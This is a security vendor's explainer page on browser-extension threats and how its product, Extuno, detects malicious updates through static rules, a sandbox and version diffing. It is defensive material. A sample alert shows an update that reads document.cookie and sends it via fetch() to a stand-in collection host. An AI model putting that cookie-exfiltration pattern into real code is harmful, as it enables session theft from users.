Security hub

Browser extension security for Chrome and Firefox

Browser extensions run with deep access to the pages you visit, and a single poisoned update can turn a trusted add-on into a data thief. This hub explains the risk model and how Extuno inspects each extension before and after every update.

In shortBrowser extension security means treating every extension as code that runs with broad permissions, then scanning it statically, dynamically, and across versions so an update-channel compromise is caught before it steals sessions or data.

Why are browser extensions a high-risk attack surface?

An extension is not a static file. It is code that runs inside the browser with permissions the user granted once and rarely revisits: read and modify page content, access cookies, intercept network requests, and run on every site. That access is the point of most extensions, and it is also the prize for an attacker.

The risk is not only the original author. An extension can be sold, the developer account can be phished, or a build dependency can be backdoored. The browser then ships the new version silently. Because the permission grant already happened, the malicious update inherits all of it. This is why Chrome extensions and Firefox add-ons both need monitoring after install, not just at install time.

What does the extension threat model look like?

Concrete abuse patterns recur across incidents. Cookie and session theft reads authentication cookies or storage tokens and forwards them to an attacker endpoint, bypassing passwords and two-factor entirely. Update-channel compromise ships clean code through review, then pushes a poisoned version weeks later. Affiliate and ad fraud rewrites links and injects trackers for revenue. Cryptominers run hidden compute, and proxyware resells the victim's bandwidth.

These map to evidence the analysis can capture: a request to an unexpected host, a header read that grabs a cookie, an injected script tag. The malicious browser extensions page walks through real categories, and the Malicious DB tracks known-bad ids across stores.

How does Extuno scan an extension statically?

Static analysis reads the extension's code and manifest without running it. Extuno applies more than 1100 rules and over 1000 secret detectors across the unpacked source, flagging dangerous permission combinations, credential exfiltration paths, obfuscation, remote-code loading, and hardcoded keys left in the bundle.

Every finding carries evidence: the file, the line, why the pattern is dangerous, and the recommended action. A score with no proof is not acceptable, so the report tells an analyst exactly what to look at. Static checks are pure and fast, which makes them the first pass on every scan. See static analysis for how the rule engine and secret catalog work, and how the same scan feeds a CI gate with SARIF and JSON output.

What does the dynamic sandbox add?

Some behavior only appears at runtime. Extuno runs the extension inside an isolated, network-segmented microVM and watches what it actually does: which endpoints it contacts, what data it sends in each request body, which extension APIs it calls, and what its pages render. Screenshots and captured traffic become part of the finding evidence.

This catches an extension that looks benign in source but reads a cookie and beacons it to a remote host once loaded, or one that decodes and runs code fetched from the network. Because the sandbox is segmented and disposable, live malicious code is observed without risking the host. Read dynamic sandbox for the capture model and how endpoint and payload data is surfaced.

How does version diffing catch supply-chain attacks?

The headline differentiator is comparing versions. Extuno keeps the archived code of each version and diffs the new release against the prior one, raising a band-escalation alert when a benign extension introduces a new exfiltration channel, new obfuscation, new dangerous permission, or a broadened host scope across an update.

This is the signal a one-time install scan cannot give. An extension can pass review, build trust, then weaponize an update. The Cyberhaven 2024 attack is exactly this pattern: a trusted extension poisoned through its publisher account. Continuous re-scan plus the diff means the poisoned version is flagged when it ships, not after the damage. Details on the mechanism are in version-diff detection.

How do static, dynamic, and AI analysis work together?

The three layers cover different blind spots. Static analysis reads code that never runs in the sandbox. Dynamic analysis catches behavior that only appears live. AI code analysis reads the full source, correlates findings across versions, and explains why a pattern is dangerous in plain language; it is advisory and never overrides the evidence-based verdict.

Together they produce a single banded verdict with the evidence behind it. The same engine that scans Chrome and Firefox extensions also covers developer packages, so a team can apply one standard across the code it ships and the extensions it runs. The free browser companion brings this to end users by checking installed extensions against Extuno; see the companion.

Update-channel alert (version diff)
v2.4.1 -> v2.5.0  BAND ESCALATION
+ new endpoint: https://collect.example-cdn.net/i
+ reads document.cookie -> fetch() body
verdict: benign -> dangerous (new exfiltration channel)

Frequently asked questions

Are browser extensions safe if they passed store review?

Review is a point-in-time check. An extension that passes review can be sold or compromised and then push a malicious update through the same channel. That is why Extuno re-scans after every update and diffs versions, rather than trusting the original approval.

What permissions make an extension dangerous?

Broad host access on all sites combined with the ability to read cookies, intercept requests, or run scripts is the high-risk profile. The capability alone is not proof of malice, so Extuno reports the permission combination as evidence and correlates it with runtime behavior before raising the verdict.

Can Extuno catch an extension that only turns malicious later?

Yes. Extuno archives each version and version-diffs new releases against the prior one, raising a band-escalation alert when an update introduces a new exfiltration channel, obfuscation, or permission. This is the supply-chain signal a single install scan cannot provide.

Does the dynamic sandbox put my system at risk?

No. The extension runs inside an isolated, network-segmented, disposable microVM. The sandbox carries no real secrets, so only seeded data can leave, and the host is never in the same trust boundary as the analyzed code.

How do I check the extensions I already have installed?

Install the free browser companion. It checks your installed Chrome and Firefox extensions against Extuno and flags malicious or dangerous ones, and can request a deep scan of an unknown extension.

Related